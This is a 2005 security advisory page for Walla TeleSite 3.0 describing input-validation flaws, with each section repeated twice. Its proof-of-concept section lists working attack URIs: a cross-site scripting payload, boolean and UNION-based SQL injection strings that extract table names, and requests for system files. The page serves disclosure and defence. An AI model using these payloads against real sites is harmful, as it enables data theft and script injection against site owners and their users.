Walla TeleSite Multiple Input Validation Vulnerabilities
BID:15419
Info
Walla TeleSite Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 15419 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 15 2005 12:00AM |
| Updated: | Nov 15 2005 12:00AM |
| Credit: | Rafi Nahum is credited with the discovery of this vulnerability. |
| Vulnerable: |
Walla TeleSite Walla TeleSite 3.0 |
| Not Vulnerable: | |
Discussion
Walla TeleSite Multiple Input Validation Vulnerabilities
Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.
Walla TeleSite is prone to information and path disclosure, file enumeration, SQL injection, and cross-site scripting attacks within the context of the victim's Web browser and the affected computer.
Other attacks are also possible.
Walla Telesite version 3.0 is affected; earlier versions are also affected.
Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.
Walla TeleSite is prone to information and path disclosure, file enumeration, SQL injection, and cross-site scripting attacks within the context of the victim's Web browser and the affected computer.
Other attacks are also possible.
Walla Telesite version 3.0 is affected; earlier versions are also affected.
Exploit / POC
Walla TeleSite Multiple Input Validation Vulnerabilities
No exploit is required.
Example URI have beeen provided:
http://www.example.com/ts.exe?tsurl=0.1.0.0
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<script>alert()</script>
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,
null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--
http://www.example.com/ts.cgi?c:\boot.ini
http://www.example.com/ts.cgi?c:\boot1.ini
No exploit is required.
Example URI have beeen provided:
http://www.example.com/ts.exe?tsurl=0.1.0.0
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<script>alert()</script>
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2
http://www.example.com/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,
null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--
http://www.example.com/ts.cgi?c:\boot.ini
http://www.example.com/ts.cgi?c:\boot1.ini
Solution / Fix
Walla TeleSite Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Walla TeleSite Multiple Input Validation Vulnerabilities
References:
References:
- Walla TeleSite Web Site (Walla TeleSite)